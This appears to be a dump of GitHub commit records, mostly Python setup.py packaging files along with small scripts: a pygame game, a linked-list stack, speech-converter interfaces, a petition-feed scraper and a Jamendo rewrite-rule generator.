from distutils.core import setup, Command
from unittest import TextTestRunner, TestLoader
import os
import os.path
class TestCommand(Command):
user_options = []
def initialize_options(self):
self._testdir = os.path.join(os.getcwd(), 'test')
def finalize_options(self):
pass
def run(self):
os.chdir(self._testdir)
retval = os.system('python -m test')
if retval != 0:
raise Exception('tests failed')
class DocCommand(Command):
user_options = []
def initialize_options(self):
self._docdir = os.path.join(os.getcwd(), 'doc')
def finalize_options(self):
pass
def run(self):
os.chdir(self._docdir)
os.system('make html')
setup(
name = 'VideoConverter',
version = '1.0.1',
description = 'Video Converter library',
url = 'http://senko.net/en/',
author = 'Senko Rasic',
author_email = 'senko.rasic@dobarkod.hr',
cmdclass = {
'test': TestCommand,
'doc': DocCommand
},
packages = [ 'converter' ],
)
| mit | Python |
33427521617e45e3227ff7320362c14a6588ea5b | Remove extensions. | materialsproject/custodian,specter119/custodian,davidwaroquiers/custodian,materialsproject/custodian,xhqu1981/custodian,alberthxf/custodian,specter119/custodian,materialsproject/custodian,specter119/custodian | setup.py | setup.py | import os
from distribute_setup import use_setuptools
use_setuptools(version='0.6.10')
from setuptools import setup, find_packages
with open("README.rst") as f:
long_desc = f.read()
setup(
name="custodian",
packages=find_packages(),
version="0.1.0a",
install_requires=[],
extras_require={"vasp": ["pymatgen>=2.4.3"]},
package_data={},
author="Shyue Ping Ong",
author_email="shyuep@gmail.com",
maintainer="Shyue Ping Ong",
url="https://github.com/materialsproject/custodian",
license="MIT",
description="A simple JIT job management framework in Python.",
long_description=long_desc,
keywords=["jit", "just-in-time", "job", "management", "vasp"],
classifiers=[
"Programming Language :: Python :: 2.7",
"Development Status :: 4 - Beta",
"Intended Audience :: Science/Research",
"License :: OSI Approved :: MIT License",
"Operating System :: OS Independent",
"Topic :: Scientific/Engineering :: Information Analysis",
"Topic :: Scientific/Engineering :: Physics",
"Topic :: Scientific/Engineering :: Chemistry",
"Topic :: Software Development :: Libraries :: Python Modules"
],
download_url="https://github.com/materialsproject/custodian/archive/master.zip",
scripts=[os.path.join("scripts", f) for f in os.listdir("scripts")]
)
| import os
from distribute_setup import use_setuptools
use_setuptools(version='0.6.10')
from setuptools import setup, find_packages, Extension
with open("README.rst") as f:
long_desc = f.read()
setup(
name="custodian",
packages=find_packages(),
version="0.1.0a",
install_requires=[],
extras_require={"vasp": ["pymatgen>=2.4.3"]},
package_data={},
author="Shyue Ping Ong",
author_email="shyuep@gmail.com",
maintainer="Shyue Ping Ong",
url="https://github.com/materialsproject/custodian",
license="MIT",
description="A simple JIT job management framework in Python.",
long_description=long_desc,
keywords=["jit", "just-in-time", "job", "management", "vasp"],
classifiers=[
"Programming Language :: Python :: 2.7",
"Development Status :: 4 - Beta",
"Intended Audience :: Science/Research",
"License :: OSI Approved :: MIT License",
"Operating System :: OS Independent",
"Topic :: Scientific/Engineering :: Information Analysis",
"Topic :: Scientific/Engineering :: Physics",
"Topic :: Scientific/Engineering :: Chemistry",
"Topic :: Software Development :: Libraries :: Python Modules"
],
download_url="https://github.com/materialsproject/custodian/archive/master.zip",
scripts=[os.path.join("scripts", f) for f in os.listdir("scripts")]
)
| mit | Python |
048f643921fd291b262cac80fbc68531805419cf | Create setup.py | Flexin1981/AdxSuds | setup.py | setup.py | from distutils.core import setup
setup(
name='AdxSuds',
version='1.0',
packages=[''],
url='https://github.com/Flexin1981/AdxSuds',
license='',
author='John Dowling',
author_email='johndowling01@live.co.uk',
description='Brocade Adx Suds Module for the XML Api'
)
| mit | Python | |
7ec768f50d5d0e8537fac23a2b819965374ce582 | Use version of zope.interface we have available. | wallnerryan/flocker-profiles,jml/flocker,runcom/flocker,beni55/flocker,mbrukman/flocker,wallnerryan/flocker-profiles,1d4Nf6/flocker,moypray/flocker,mbrukman/flocker,hackday-profilers/flocker,beni55/flocker,adamtheturtle/flocker,jml/flocker,lukemarsden/flocker,moypray/flocker,mbrukman/flocker,achanda/flocker,Azulinho/flocker,agonzalezro/flocker,runcom/flocker,w4ngyi/flocker,hackday-profilers/flocker,beni55/flocker,AndyHuu/flocker,achanda/flocker,AndyHuu/flocker,1d4Nf6/flocker,adamtheturtle/flocker,w4ngyi/flocker,runcom/flocker,Azulinho/flocker,AndyHuu/flocker,LaynePeng/flocker,jml/flocker,agonzalezro/flocker,adamtheturtle/flocker,wallnerryan/flocker-profiles,hackday-profilers/flocker,LaynePeng/flocker,LaynePeng/flocker,w4ngyi/flocker,moypray/flocker,1d4Nf6/flocker,agonzalezro/flocker,achanda/flocker,lukemarsden/flocker,lukemarsden/flocker,Azulinho/flocker | setup.py | setup.py | # Copyright Hybrid Logic Ltd. See LICENSE file for details.
#
# Generate a Flocker package that can be deployed onto cluster nodes.
#
import os.path
from setuptools import setup
path = os.path.join(os.path.dirname(__file__), b"flocker/version")
with open(path) as fObj:
version = fObj.read().strip()
del path
setup(
# This is the human-targetted name of the software being packaged.
name="Flocker",
# This is a string giving the version of the software being packaged. For
# simplicity it should be something boring like X.Y.Z.
version=version,
# This identifies the creators of this software. This is left symbolic for
# ease of maintenance.
author="HybridCluster Team",
# This is contact information for the authors.
author_email="support@hybridcluster.com",
# Here is a website where more information about the software is available.
url="http://hybridcluster.com/",
# This defines *Python* packages (in other words, things that can be
# imported) which are part of the package. Most of what they contain will
# be included in the package automatically by virtue of the packages being
# mentioned here. These aren't recursive so each sub-package must also be
# explicitly included.
packages=[
"flocker", "flocker.test",
],
# This defines extra non-source files that live in the source tree that
# need to be included as part of the package.
package_data={
# This is the canonical definition of the source form of the cluster
# version.
"flocker": ["version"],
},
install_requires=[
"machinist == 0.1",
"zope.interface == 4.0.5",
# Pinning this isn't great in general, but we're only using UTC so meh:
"pytz == 2014.2",
"Twisted == 13.2.0"
],
extras_require={
# This extra allows you to build the documentation for Flocker.
"doc": ["Sphinx==1.2", "sphinx-rtd-theme==0.1.6"],
# This extra is for developers who need to work on Flocker itself.
"dev": ["pyflakes==0.8.1"]
},
)
| # Copyright Hybrid Logic Ltd. See LICENSE file for details.
#
# Generate a Flocker package that can be deployed onto cluster nodes.
#
import os.path
from setuptools import setup
path = os.path.join(os.path.dirname(__file__), b"flocker/version")
with open(path) as fObj:
version = fObj.read().strip()
del path
setup(
# This is the human-targetted name of the software being packaged.
name="Flocker",
# This is a string giving the version of the software being packaged. For
# simplicity it should be something boring like X.Y.Z.
version=version,
# This identifies the creators of this software. This is left symbolic for
# ease of maintenance.
author="HybridCluster Team",
# This is contact information for the authors.
author_email="support@hybridcluster.com",
# Here is a website where more information about the software is available.
url="http://hybridcluster.com/",
# This defines *Python* packages (in other words, things that can be
# imported) which are part of the package. Most of what they contain will
# be included in the package automatically by virtue of the packages being
# mentioned here. These aren't recursive so each sub-package must also be
# explicitly included.
packages=[
"flocker", "flocker.test",
],
# This defines extra non-source files that live in the source tree that
# need to be included as part of the package.
package_data={
# This is the canonical definition of the source form of the cluster
# version.
"flocker": ["version"],
},
install_requires=[
"machinist == 0.1",
"zope.interface == 4.1.1",
# Pinning this isn't great in general, but we're only using UTC so meh:
"pytz == 2014.2",
"Twisted == 13.2.0"
],
extras_require={
# This extra allows you to build the documentation for Flocker.
"doc": ["Sphinx==1.2", "sphinx-rtd-theme==0.1.6"],
# This extra is for developers who need to work on Flocker itself.
"dev": ["pyflakes==0.8.1"]
},
)
| apache-2.0 | Python |
e5175894d49afe8205f0f969ffc4ea9eecec0f72 | add setup.py file | jephdo/pynvd3 | setup.py | setup.py | from distutils.core import setup
setup(
name='pynvd3',
version='0.01',
description='A Python wrapper for NVD3.js',
url='http://github.com/jephdo/pynvd3/',
author='Jeph Do',
author_email='jephdo@gmail.com',
packages=[
'pynvd3',
],
classifiers=[
'Development Status :: 1 - Planning',
'Operating System :: OS Independent',
'Programming Language :: Python',
'Programming Language :: Python :: 3',
]
)
| mit | Python | |
d38554332872c1b8f4a3a44bf4c18dda68752d04 | add setup.py file | pavlov99/json-rpc | setup.py | setup.py | import os
from setuptools import setup, find_packages
from pmll import version
# Import multiprocessing to prevent test run problem. In case of nosetests
# (not nose2) there is probles, for details see:
# https://groups.google.com/forum/#!msg/nose-users/fnJ-kAUbYHQ/_UsLN786ygcJ
# http://bugs.python.org/issue15881#msg170215w
try:
import multiprocessing
except ImportError:
pass
def read(fname):
try:
return open(os.path.join(os.path.dirname(__file__), fname)).read()
except IOError:
return ""
install_requires = read("requirements.txt").split()
setup(
name="json-rpc",
version=version,
packages=find_packages(),
# test_suite="nose2.collector.collector",
test_suite="nose.collector",
tests_require=["nose"],
# metadata for upload to PyPI
author="Kirill Pavlov",
author_email="kirill.pavlov@phystech.edu",
url="https://github.com/pavlov99/json-rpc",
description="JSON-RPC transport realisation",
# Full list:
# https://pypi.python.org/pypi?%3Aaction=list_classifiers
classifiers=[
"Development Status :: 3 - Alpha",
"Environment :: Console",
"Intended Audience :: Science/Research",
"License :: OSI Approved :: MIT License",
"Natural Language :: English",
"Operating System :: OS Independent",
"Programming Language :: Python :: 2.7",
"Programming Language :: Python :: 3.2",
"Topic :: Software Development :: Libraries",
],
license="MIT",
)
| mit | Python | |
340baa5f077b0ae3cb1ab6de736d67be89319c35 | Create setup.py | theskumar/python-usernames | setup.py | setup.py | # -*- coding: utf-8 -*-
from __future__ import unicode_literals
from setuptools import setup
setup(
name="python-usernames",
description="Python library to validate usernames suitable for use in public facing applications.",
version="0.0.1",
author="Saurabh Kumar",
author_email="me+github@saurabh-kumar.com",
url="http://github.com/theskumar/python-usernames",
keywords=['username', 'validation', 'registration', 'python'],
py_modules=['usernames'],
install_requires=[
'click>=5.0',
],
entry_points='''
[console_scripts]
validate_username=usernames:cli
''',
classifiers=[
# As from https://pypi.python.org/pypi?%3Aaction=list_classifiers
'Development Status :: 1 - Planning',
# 'Development Status :: 2 - Pre-Alpha',
# 'Development Status :: 3 - Alpha',
# 'Development Status :: 4 - Beta',
# 'Development Status :: 5 - Production/Stable',
# 'Development Status :: 6 - Mature',
# 'Development Status :: 7 - Inactive',
'Programming Language :: Python',
'Programming Language :: Python :: 2',
# 'Programming Language :: Python :: 2.3',
# 'Programming Language :: Python :: 2.4',
# 'Programming Language :: Python :: 2.5',
'Programming Language :: Python :: 2.6',
'Programming Language :: Python :: 2.7',
'Programming Language :: Python :: 3',
# 'Programming Language :: Python :: 3.0',
# 'Programming Language :: Python :: 3.1',
# 'Programming Language :: Python :: 3.2',
'Programming Language :: Python :: 3.3',
'Programming Language :: Python :: 3.4',
# 'Programming Language :: Python :: 3.4',
'Intended Audience :: Developers',
'Intended Audience :: System Administrators',
'License :: OSI Approved :: MIT License',
'Operating System :: OS Independent',
# 'Topic :: System :: Systems Administration',
'Topic :: Utilities',
# 'Environment :: Web Environment',
# 'Framework :: Django',
]
)
# (*) Please direct queries to the discussion group, rather than to me directly
# Doing so helps ensure your question is helpful to other users.
# Queries directly to my email are likely to receive a canned response.
#
# Many thanks for your understanding.
| mit | Python | |
c3b44b012ddc18f7a6711609f04060f65bd36846 | include history with readme for setup.py | jimyx17/gmusic,peetahzee/Unofficial-Google-Music-API,nvbn/Unofficial-Google-Music-API,tanhaiwang/gmusicapi,TheOpenDevProject/gmusicapi,simon-weber/Unofficial-Google-Music-API,dvirtz/gmusicapi,thebigmunch/gmusicapi,dvirtz/gmusicapi,simon-weber/gmusicapi | setup.py | setup.py | #!/usr/bin/env python
from distutils.core import setup
from setuptools import find_packages
import re
#This hack is from http://stackoverflow.com/a/7071358/1231454;
# the version is kept in a seperate file and gets parsed - this
# way, setup.py doesn't have to import the package.
VERSIONFILE = 'gmusicapi/version.py'
version_line = open(VERSIONFILE).read()
version_re = r"^__version__ = ['\"]([^'\"]*)['\"]"
match = re.search(version_re, version_line, re.M)
if match:
version = match.group(1)
else:
raise RuntimeError("Could not find version in '%s'" % VERSIONFILE)
setup(
name='gmusicapi',
version=version,
author='Simon Weber',
author_email='simon@simonmweber.com',
url='http://pypi.python.org/pypi/gmusicapi/',
packages=find_packages(),
scripts=[],
license=open('LICENSE').read(),
description='An unofficial api for Google Play Music.',
long_description=(open('README.rst').read() + '\n\n' +
open('HISTORY.rst').read()),
install_requires=[
'validictory == 0.9.0',
'decorator == 3.3.2',
'mutagen == 1.21',
'protobuf == 2.4.1',
'chardet == 2.1.1',
'requests == 1.1.0',
#for testing album art:
#'hachoir-core == 1.3.3',
#'hachoir-parser == 1.3.4',
#'hachoir-metadata == 1.3.3',
],
classifiers=[
'Programming Language :: Python',
'Programming Language :: Python :: 2.7',
'Intended Audience :: Developers',
'License :: OSI Approved :: BSD License',
'Operating System :: OS Independent',
'Topic :: Multimedia :: Sound/Audio',
'Topic :: Software Development :: Libraries :: Python Modules'
],
include_package_data=True,
zip_safe=False,
)
| #!/usr/bin/env python
from distutils.core import setup
from setuptools import find_packages
import re
VERSIONFILE = 'gmusicapi/version.py'
version_line = open(VERSIONFILE).read()
version_re = r"^__version__ = ['\"]([^'\"]*)['\"]"
match = re.search(version_re, version_line, re.M)
if match:
version = match.group(1)
else:
raise RuntimeError("Could not find version in '%s'" % VERSIONFILE)
setup(
name='gmusicapi',
version=version,
author='Simon Weber',
author_email='simon@simonmweber.com',
url='http://pypi.python.org/pypi/gmusicapi/',
packages=find_packages(),
scripts=[],
license=open('LICENSE').read(),
description='An unofficial api for Google Play Music.',
long_description=open('README.rst').read(),
install_requires=[
'validictory == 0.9.0',
'decorator == 3.3.2',
'mutagen == 1.21',
'protobuf == 2.4.1',
'chardet == 2.1.1',
'requests == 1.1.0',
#for testing album art:
#'hachoir-core == 1.3.3',
#'hachoir-parser == 1.3.4',
#'hachoir-metadata == 1.3.3',
],
classifiers=[
'Programming Language :: Python',
'Programming Language :: Python :: 2.7',
'Intended Audience :: Developers',
'License :: OSI Approved :: BSD License',
'Operating System :: OS Independent',
'Topic :: Multimedia :: Sound/Audio',
'Topic :: Software Development :: Libraries :: Python Modules'
],
include_package_data=True,
zip_safe=False,
)
| bsd-3-clause | Python |
91dca4294beccd4b7ff4ff9e1f029c7d63273928 | Create setup.py | heinst/track-class-availability,heinst/track-class-availability | setup.py | setup.py | from setuptools import setup
setup(name='track-class-availability',
version='1.0',
install_requires=['BeautifulSoup >= 4.3.2', 'schedule >= 0.3.1']
)
| mit | Python | |
eb12d44dffadf0c62fe231926a5004e5ef58d1a4 | Add the setup script | tschijnmo/ccpoviz | setup.py | setup.py | from setuptools import setup, find_packages
setup(
name = "ccpoviz",
version = "0.0.1",
packages = find_packages(),
scripts = [],
install_requires = [
'docutils>=0.3',
'pystache>=0.5',
],
package_data = {
'ccpoviz': ['data/*.json', 'data/*.dat'],
},
# metadata for upload to PyPI
author = "Tschijnmo TSCHAU",
author_email = "tschijnmotschau@gmail.com",
description = "Command-line batch molecular visualizer",
license = "MIT",
keywords = "visualization, chemistry",
url = "http://tschijnmo.github.io/ccpoviz",
)
| mit | Python | |
d3e1957915ed9d385742232475ac8992b17c6e7e | bump up version to 1.0.0 | nvie/smart_open,EverythingMe/smart_open,laugustyniak/smart_open,val314159/smart_open,piskvorky/smart_open,mpenkov/smart_open,gojomo/smart_open,RaRe-Technologies/smart_open,RaRe-Technologies/smart_open,tarosky/smart_open,asieira/smart_open,ziky90/smart_open,mpenkov/smart_open | setup.py | setup.py | #!/usr/bin/env python
# -*- coding: utf-8 -*-
#
# Copyright (C) 2015 Radim Rehurek <me@radimrehurek.com>
#
# This code is distributed under the terms and conditions
# from the MIT License (MIT).
import os
import sys
# minimum required version is 2.6; py3k not supported yet
if not ((2, 6) <= sys.version_info < (3, 0)):
raise ImportError("smart_open requires 2.6 <= python < 3")
# TODO add ez_setup?
from setuptools import setup, find_packages
def read(fname):
return open(os.path.join(os.path.dirname(__file__), fname)).read()
setup(
name = 'smart_open',
version = '1.0.0',
description = 'Utils for streaming large files (S3, HDFS, gzip, bz2...)',
long_description = read('README.rst'),
packages=find_packages(),
author = u'Radim Řehůřek',
author_email = 'radimrehurek@seznam.cz',
maintainer = u'Vincent Kríž',
maintainer_email = 'vincent.kriz@kamadu.eu',
url = 'https://github.com/piskvorky/smart_open',
download_url = 'http://pypi.python.org/pypi/smart_open',
keywords = 'file streaming, s3, hdfs',
license = 'MIT',
platforms = 'any',
install_requires=[
'boto >= 2.0',
],
test_suite="smart_open.tests",
classifiers = [ # from http://pypi.python.org/pypi?%3Aaction=list_classifiers
'Development Status :: 4 - Beta',
'Environment :: Console',
'Intended Audience :: Developers',
'License :: Public Domain',
'Operating System :: OS Independent',
'Programming Language :: Python :: 2.6',
'Programming Language :: Python :: 2.7',
'Topic :: System :: Distributed Computing',
'Topic :: Database :: Front-Ends',
],
)
| #!/usr/bin/env python
# -*- coding: utf-8 -*-
#
# Copyright (C) 2015 Radim Rehurek <me@radimrehurek.com>
#
# This code is distributed under the terms and conditions
# from the MIT License (MIT).
import os
import sys
# minimum required version is 2.6; py3k not supported yet
if not ((2, 6) <= sys.version_info < (3, 0)):
raise ImportError("smart_open requires 2.6 <= python < 3")
# TODO add ez_setup?
from setuptools import setup, find_packages
def read(fname):
return open(os.path.join(os.path.dirname(__file__), fname)).read()
setup(
name = 'smart_open',
version = '0.1.1',
description = 'Utils for streaming large files (S3, HDFS, gzip, bz2...)',
long_description = read('README.rst'),
packages=find_packages(),
author = u'Radim Řehůřek',
author_email = 'radimrehurek@seznam.cz',
maintainer = u'Vincent Kríž',
maintainer_email = 'vincent.kriz@kamadu.eu',
url = 'https://github.com/piskvorky/smart_open',
download_url = 'http://pypi.python.org/pypi/smart_open',
keywords = 'file streaming, s3, hdfs',
license = 'MIT',
platforms = 'any',
install_requires=[
'boto >= 2.0',
],
test_suite="smart_open.tests",
classifiers = [ # from http://pypi.python.org/pypi?%3Aaction=list_classifiers
'Development Status :: 3 - Alpha',
'Environment :: Console',
'Intended Audience :: Developers',
'License :: Public Domain',
'Operating System :: OS Independent',
'Programming Language :: Python :: 2.6',
'Programming Language :: Python :: 2.7',
'Topic :: System :: Distributed Computing',
'Topic :: Database :: Front-Ends',
],
)
| mit | Python |
7f63c5b2a624870667d62ff21cbfb28c7cf2a189 | add setup script | yinyin/FileWatcher | setup.py | setup.py | #!/usr/bin/env python
# -*- coding: utf-8 -*-
from distutils.core import setup
setup(name='FileWatcher',
version='1.00',
description='File watching framework',
packages=['filewatcher', ],
package_dir={'': 'lib'},
requires=['PyYAML (>=3.09)', ],
install_requires=['PyYAML >= 3.09', ],
classifiers=['Development Status :: 5 - Production/Stable',
'Intended Audience :: Developers',
'License :: OSI Approved :: MIT License',
'Operating System :: POSIX',
'Programming Language :: Python :: 2.6',
'Programming Language :: Python :: 2.7', ],
license='MIT License',
)
# vim: ts=4 sw=4 ai nowrap
| mit | Python | |
58b92617e03742658a6362f66664109de8993038 | Create setup.py | fnielsen/cvrminer,fnielsen/cvrminer,fnielsen/cvrminer | setup.py | setup.py | from setuptools import setup
setup(
name='cvrminer',
author='Finn Aarup Nielsen',
author_email='faan@dtu.dk',
license='Apache License',
url='https://github.com/fnielsen/cvrminer',
packages=['cvrminer'],
test_requires=['flake8'],
)
| apache-2.0 | Python | |
9abae470ce9cf9d255921d7c4306ee7daadcd6f2 | Add setup.py | legnaleurc/telezombie,legnaleurc/wcpan.telegram | setup.py | setup.py | from setuptools import setup, find_packages
from codecs import open
from os import path
here = path.abspath(path.dirname(__file__))
# Get the long description from the relevant file
with open(path.join(here, 'README.md'), encoding='utf-8') as f:
long_description = f.read()
setup(
name='telezombie',
version='0.1',
description='Telegram Bot API with Tornado',
long_description=long_description,
url='https://github.com/legnaleurc/telezombie',
author='Wei-Cheng Pan',
author_email='legnaleurc@gmail.com',
license='MIT',
classifiers=[
'Development Status :: 4 - Beta',
'Intended Audience :: Developers',
'Topic :: Communications :: Chat',
'License :: OSI Approved :: MIT License',
'Programming Language :: Python :: 3 :: Only',
'Programming Language :: Python :: 3',
'Programming Language :: Python :: 3.0',
'Programming Language :: Python :: 3.1',
'Programming Language :: Python :: 3.2',
'Programming Language :: Python :: 3.3',
'Programming Language :: Python :: 3.4',
],
keywords='telegram tornado',
packages=find_packages(exclude=['contrib', 'docs', 'tests*']),
install_requires=['tornado >= 4', 'pyyaml'],
)
| mit | Python | |
fcf000ee1b6834b5eabc106f6b617157443ed94d | Create sezar.py | GenkaNuank/Crypter | sezar.py | sezar.py | password = [7,29,12,21,5,19,2,11,28,16,10,1,15,24,8,25,4,13,20,18,14,3,17,22,9,23,26,27,6]
def encrypt(a):
cipher = []
i = 0
n = 0
while i < len(a):
while n < len(password):
if int(a[i]) == (n+1):
cipher = cipher + [password[n]]
i += 1
n = 0
break
else:
n += 1
return cipher
def decrypt(a):
solve = []
i = 0
n = 0
while i < len(a):
while n < len(password):
if int(a[i]) == int(password[n]):
solve = solve + [(n+1)]
i += 1
n = 0
break
else:
n += 1
return solve
| mpl-2.0 | Python | |
f1334c006f07b2b1494d4b92a3ecb4186d8e3954 | add stack.py to branch | jesseklein406/data-structures | stack.py | stack.py | from linked_list import LinkedList
#Stack inherits from LinkedList class
class Stack(object):
def __init__(self, iterable=None):
if iterable != None:
self._linkedList = LinkedList(iterable)
else:
self._linkedList = LinkedList()
def push(self, value):
self._linkedList.insert(value)
def pop(self):
return self._linkedList.pop() | mit | Python | |
785a1962c910a722f218bc814d1868f2b4bc7033 | Add interfaces: Parmeterizer, Converter, Analyzer and Synthesizer (and some thier subclasses) | k2kobayashi/sprocket | vctk/interface.py | vctk/interface.py | # coding: utf-8
import numpy as np
"""
Interfaces
"""
class Analyzer(object):
"""
Speech analyzer interface
All of analyzer must implement this interface.
"""
def __init__(self):
pass
def analyze(self, x):
"""
Paramters
---------
x: array, shape (`time samples`)
monoural speech signal in time domain
"""
raise "Not implemented"
class Synthesizer(object):
"""
Speech synthesizer interface
All of synthesizer must implement this interface.
"""
def __init__(self):
pass
def synthesis(self, params):
"""
Paramters
---------
param: tuple
speech parameters (f0, spectrum envelop, aperiodicity)
"""
raise "Not implemented"
class Parameterizer(object):
"""
Parameterizer interface.
All parameterizer must implement this interface.
"""
def __init__(self):
pass
def forward(self, raw):
raise "You must provide a forward parameterization"
def backward(self, param):
raise "You must provide s backward parameterization"
class SpectrumEnvelopeParameterizer(Parameterizer):
"""
Spectrum envelope parameterizer interface
All spectrum envelope parameterizer must implement this interface.
"""
def __init__(self):
pass
class Converter(object):
"""
Abstract Feature Converter
All feature converter must implment this interface.
"""
def __init__(self):
pass
def convert(self, feature):
raise "Not implemented"
class SpectrumEnvelopeConverter(Converter):
"""
Interface of spectrum envelope converter
All of spectrum envelope converter must implement this class
"""
def __init__(self):
pass
def get_shape(self):
"""
this should return feature dimention
"""
raise "Not implemented"
class FrameByFrameSpectrumEnvelopeConverter(SpectrumEnvelopeConverter):
"""
Interface of frame-by-frame spectrum envelope converter
"""
def __init__(self):
pass
def convert_one_frame(self, feature_vector):
raise "converters must provide conversion for each time frame"
def convert(self, feature_matrix):
"""
FrameByFrame converters perform conversion for each time frame
"""
T = len(feature_matrix)
converted = np.zeros((T, self.get_shape()))
for t in range(T):
converted[t] = self.convert_one_frame(feature_matrix[t])
return converted
class TrajectorySpectrumEnvelopeConverter(SpectrumEnvelopeConverter):
"""
TODO
"""
def __init__(self):
pass
| mit | Python | |
ab7d1b230a5ef1c0763da1d150488add0b75ce31 | Add test file | msoedov/flask-graphql-example,msoedov/flask-graphql-example,msoedov/flask-graphql-example,msoedov/flask-graphql-example | tests.py | tests.py | import unittest
class MyappTestCase(unittest.TestCase):
def setUp(self):
myapp.app.config['DEBUG'] = tempfile.mkstemp()
self.app = myapp.app.test_client()
def tearDown(self):
pass
def test_index(self):
rv = self.app.get('/')
assert '<h2>Posts</h2>' in rv.data
if __name__ == '__main__':
unittest.main()
| mit | Python | |
4029f604a4c809a201d0334946d680fb53b467dd | add initial pygame prototype | robotenique/RandomAccessMemory,robotenique/RandomAccessMemory,robotenique/RandomAccessMemory | Python_Data/multimedia/pygameTest.py | Python_Data/multimedia/pygameTest.py | import random as rnd
import pygame
import sys
def generateObj():
objPos = (rnd.randint(50, 950), rnd.randint(50, 950))
objColor = (0, 0, 0)
return list([objColor, objPos])
pygame.init()
bgcolor = (255, 255, 204)
surf = pygame.display.set_mode((1000,1000))
circleColor = (255, 51, 51)
x, y = 500, 500
circleRad = 50
objRad = 25
pygame.display.set_caption("TOOOPPPER!")
obj = generateObj()
change = False
while True:
for event in pygame.event.get():
if event.type == pygame.QUIT:
sys.exit()
elif event.type == pygame.KEYDOWN:
bgcolor = (rnd.randint(50,255), rnd.randint(200,255), rnd.randint(200,255))
circleColor = (rnd.randint(0,255), rnd.randint(0,255), rnd.randint(0,255))
if(change == True):
obj = generateObj()
change = False
if event.key == pygame.K_UP:
y -= 40
elif event.key == pygame.K_DOWN:
y += 40
elif event.key == pygame.K_RIGHT:
x += 40
elif event.key == pygame.K_LEFT:
x -= 40
circlePos = (x % 1000, y % 1000)
surf.fill(bgcolor)
if((circlePos[0] - obj[1][0])**2 + (circlePos[1] - obj[1][1])**2 <= (objRad+circleRad)**2):
obj[1] = (-400, -400)
circleRad += 20
change = True
if(circleRad >= 450):
sys.exit()
pygame.draw.circle(surf, circleColor, circlePos, circleRad)
pygame.draw.circle(surf, obj[0], obj[1], objRad)
pygame.display.flip()
| unlicense | Python | |
b6ee1301075bcd391ce86d54075bf853f4ee6b2d | Add version.py | LabPy/lantz_drivers,MatthieuDartiailh/lantz_drivers,alexforencich/lantz_drivers,elopezga/lantz_drivers | lantz_drivers/version.py | lantz_drivers/version.py | __version__ = '0.0.1'
| bsd-3-clause | Python | |
9387fb8ee3865fdc00b0b96fd8db77ef1b2f13a8 | Create watchingthestuffoverhere.py | ev0x/stuff,ev0x/stuff | python/watchingthestuffoverhere.py | python/watchingthestuffoverhere.py | #!/usr/bin/env python
# coding=utf-8
import string
import re
import csv
from selenium import webdriver
from datetime import datetime
#avaaz url to watch
tehURL = "somethingsomething"
ignores = re.compile('(seconds|minute|minutes|just)\s(ago|now)')
lst = []
while True:
try:
driver = webdriver.PhantomJS()
driver.get(tehURL)
live = driver.find_element_by_id('block-petition-live-feed')
now = datetime.now()
with open("output.csv", "a") as csvfile:
writer = csv.writer(csvfile, delimiter=',')
lines = string.split(live.text, '\n')
for l in lines:
if l != 'RECENT SIGNERS':
if not ignores.search(l):
try:
enc = l
except:
enc = l.encode("utf-8")
if not enc in lst:
lst.append(enc)
enc = '%s, %s' %(now, enc.encode("utf-8"))
try:
print enc.encode("utf-8")
except:
print "Issuing printing output UTF8"
try:
writer.writerow(enc.split(','))
except:
print "Issuing writing to csv"
driver.quit()
except:
print "A weird thing happened..."
| mit | Python | |
fbbb65524a3b8f5486594d89f6cf885663ac7f3d | Support ubuntu variable for DESKTOP_SESSION | hanya/BookmarksMenu,hanya/BookmarksMenu | pythonpath/bookmarks/env/ubuntu.py | pythonpath/bookmarks/env/ubuntu.py |
OPEN = "xdg-open"
FILE_MANAGER = "nautilus"
| apache-2.0 | Python | |
ab52a21b1d4c1260f2f225a4c49f46251bbecd27 | Add script for generating jamendo rewrite rules | foocorp/gnu-fm,foocorp/gnu-fm,foocorp/gnu-fm,foocorp/gnu-fm,foocorp/gnu-fm,foocorp/gnu-fm,foocorp/gnu-fm,foocorp/gnu-fm,foocorp/gnu-fm | scripts/jamendo-rewrite.py | scripts/jamendo-rewrite.py | #!/usr/bin/env python
# Jamendo database dumps can be fetched from: http://img.jamendo.com/data/dbdump_artistalbumtrack.xml.gz
import xml.etree.cElementTree as ElementTree
import sys, gzip, time, os, os.path, urllib, threading
class JamendoRewrite:
def __init__(self, path):
self.music_path = path
print "RewriteEngine on"
def parse(self, dump):
for event, elem in ElementTree.iterparse(dump):
if elem.tag == "artist":
artist = self.proc_artist(elem)
self.make_rules(artist)
def proc_artist(self, elem):
artist = {}
artist["albums"] = []
for artist_e in elem.getchildren():
if artist_e.tag == "name":
artist["name"] = artist_e.text
if artist_e.tag == "Albums":
for album_e in artist_e.getchildren():
artist["albums"].append(self.proc_album(album_e))
return artist
def proc_album(self, elem):
album = {}
album["tracks"] = []
album["name"] = None
for album_e in elem.getchildren():
if album_e.tag == "name":
album["name"] = album_e.text
if album_e.tag == "Tracks":
for track_e in album_e.getchildren():
album["tracks"].append(self.proc_track(track_e))
return album
def proc_track(self, elem):
track = {}
track["id"] = None
track["name"] = None
track["license"] = None
for track_e in elem.getchildren():
if track_e.tag == "id":
track["id"] = int(track_e.text)
if track_e.tag == "name":
track["name"] = track_e.text
if track_e.tag == "license":
track["license"] = track_e.text
return track
def make_rules(self, artist):
for album in artist["albums"]:
for track in album["tracks"]:
if track["id"] and track["name"] and album["name"] and artist["name"] and self.free_license(track["license"]):
filename = "%s-%s-%s" % (artist["name"].replace("/", ""), album["name"].replace("/", ""), track["name"].replace("/", " "))
filename = filename.encode("utf-8")
rule = "RewriteRule ^%d\.(...) %s/%s.$1" % (track['id'], self.music_path, urllib.quote(filename))
rule = rule.replace("%20", "\ ")
print rule
def free_license(self, license):
return ("http://creativecommons.org/licenses/by-sa" in license or "http://creativecommons.org/licenses/by/" in license or "http://artlibre.org/licence.php/lal.html" in license)
if __name__ == "__main__":
if len(sys.argv) != 3:
print "Usage: download-jamendo.py <database dump> /path/to/music_files/"
sys.exit(1)
if sys.argv[1][-2:] == "gz":
dump = gzip.open(sys.argv[1], "r")
else:
dump = open(sys.argv[1], "r")
rewriter = JamendoRewrite(sys.argv[2])
rewriter.parse(dump)
| agpl-3.0 | Python | |
